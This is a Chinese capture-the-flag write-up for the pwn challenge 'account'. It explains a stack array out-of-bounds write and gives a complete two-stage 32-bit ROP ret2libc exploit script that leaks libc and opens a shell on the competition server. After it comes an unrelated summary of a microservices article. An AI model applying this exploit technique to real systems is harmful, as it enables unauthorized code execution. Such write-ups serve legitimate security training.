磐石CTF2025 Pwn赛题account详解:32位环境下的数组越界与ROP实战

account

前言

关注公众号【Real返璞归真】,回复【磐石CTF2025】获取附件下载地址。

题目名:account

解题数:121

题目描述:无

知识点:数组越界访问、栈溢出、32位ROP

逆向分析

题目逻辑非常简单,只有一个vuln()函数:

image-20250807191623752

我们输入的数据被存储到v0变量中,这里把v0[0]也识别成后续数组的一部分了,我们对其修复,把v0类型改成非数组即可:

image-20250807191735782

漏洞分析

vuln()函数会循环读取我们的4字节输入,然后修改v1[v2++] = v0,从v1[0]逐渐向栈中高地址处增长,这里存在栈溢出漏洞。

如果增长的次数足够多,我们可以覆盖old_rbpret_addr等数据。思路非常简单,我们直接向返回地址处写入ROP即可。

需要注意一点:修改v1[10]即修改变量v2,它是数组当前循环的下标,我们需要写入一个合法的值,否则会出错。

先将v1数组写满,然后修改v2变量为13(下次循环会修改v1[14]位置,即存储返回地址的位置):

for i in range(10):
    p.sendline(b'57005') # 0x1234
    sleep(0.2)

# overwrite idx->13
p.sendline(b'13')
sleep(0.2)

然后,写入第一次rop泄露libc地址:

# rop1
main = 0x8049264
pop_ebx_ret = 0x08049022

# gdb.attach(p, 'b *0x80492C8\nc')
# pause()

p.sendline(str(elf.plt['puts']).encode())
sleep(0.2)
p.sendline(str(pop_ebx_ret).encode())
sleep(0.2)
p.sendline(str(elf.got['puts']).encode())
sleep(0.2)
p.sendline(str(main).encode())
sleep(0.2)

p.sendline(b'0')

p.recvuntil(b'Recording completed\n')
libc_base = u32(p.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00')) - 0x6d1e0
libc.address = libc_base
success("libc_base = " + hex(libc_base))

然后,写入第二次rop直接ret2libc即可:

# rop2
for i in range(10):
    p.sendline(b'57005') # 0x1234
    sleep(0.2)

# overwrite idx->13
p.sendline(b'13')
sleep(0.2)

# gdb.attach(p, 'b *0x80492C8\nc')
# pause()

def to_signed(val):
    return val if val < 0x80000000 else val - 0x100000000

p.sendline(str(to_signed(libc.sym['system'])).encode())
sleep(0.2)
p.sendline(str(pop_ebx_ret).encode())
sleep(0.2)
p.sendline(str(to_signed(next(libc.search(b'/bin/sh\x00')))).encode())
sleep(0.2)

p.sendline(b'0')

这里需要注意,32位程序中的地址均为4字节无符号整数,而程序使用scanf("%d", &v0)读入的是4字节有符号整数

如果ROP中想写入的地址非常大,%d将无法读取,我们需要先将这个大数字转换为对应的负数,然后输入到程序中。

exp

from pwn import *

elf = ELF("./account")
libc = ELF("./libc-2.31.so")
# p = process([elf.path])
p = remote("pss.idss-cn.com", 22117)

context(arch=elf.arch, os=elf.os)
context.log_level = 'debug'

for i in range(10):
    p.sendline(b'57005') # 0x1234
    sleep(0.2)

# overwrite idx->13
p.sendline(b'13')
sleep(0.2)

# rop1
main = 0x8049264
pop_ebx_ret = 0x08049022

# gdb.attach(p, 'b *0x80492C8\nc')
# pause()

p.sendline(str(elf.plt['puts']).encode())
sleep(0.2)
p.sendline(str(pop_ebx_ret).encode())
sleep(0.2)
p.sendline(str(elf.got['puts']).encode())
sleep(0.2)
p.sendline(str(main).encode())
sleep(0.2)

p.sendline(b'0')

p.recvuntil(b'Recording completed\n')
libc_base = u32(p.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00')) - 0x6d1e0
libc.address = libc_base
success("libc_base = " + hex(libc_base))

# rop2
for i in range(10):
    p.sendline(b'57005') # 0x1234
    sleep(0.2)

# overwrite idx->13
p.sendline(b'13')
sleep(0.2)

# gdb.attach(p, 'b *0x80492C8\nc')
# pause()

def to_signed(val):
    return val if val < 0x80000000 else val - 0x100000000

p.sendline(str(to_signed(libc.sym['system'])).encode())
sleep(0.2)
p.sendline(str(pop_ebx_ret).encode())
sleep(0.2)
p.sendline(str(to_signed(next(libc.search(b'/bin/sh\x00')))).encode())
sleep(0.2)

p.sendline(b'0')

p.interactive()
内容概要:本文详细介绍了“秒杀商城”微服务架构的设计实战全过程,涵盖系统从需求分析、服务拆分、技术选型到核心功能开发、分布式事务处理、容器化部署及监控链路追踪的完整流程。重点解决了高并发场景下的超卖问,采用Redis预减库存、消息队列削峰、数据库乐观锁等手段保障数据一致性,并通过Nacos实现服务注册发现配置管理,利用Seata处理跨服务分布式事务,结合RabbitMQ实现异步下单,提升系统吞吐能力。同时,项目支持Docker Compose快速部署和Kubernetes生产级编排,集成Sleuth+Zipkin链路追踪Prometheus+Grafana监控体系,构建可观测性强的微服务系统。; 适合人群:具备Java基础和Spring Boot开发经验,熟悉微服务基本概念的中高级研发人员,尤其是希望深入理解高并发系统设计、分布式事务、服务治理等核心技术的开发者;适合工作2-5年、有志于转型微服务或提升架构能力的工程师; 使用场景及目标:①学习如何基于Spring Cloud Alibaba构建完整的微服务项目;②掌握秒杀场景下高并发、超卖控制、异步化、削峰填谷等关键技术方案;③实践分布式事务(Seata)、服务熔断降级、链路追踪、统一配置中心等企业级中间件的应用;④完成从本地开发到容器化部署的全流程落地; 阅读建议:建议按照文档提供的七个阶段循序渐进地动手实践,重点关注秒杀流程设计、服务间通信机制、分布式事务实现和系统性能优化部分,结合代码调试监控工具深入理解各组件协作原理,真正掌握高并发微服务系统的构建能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值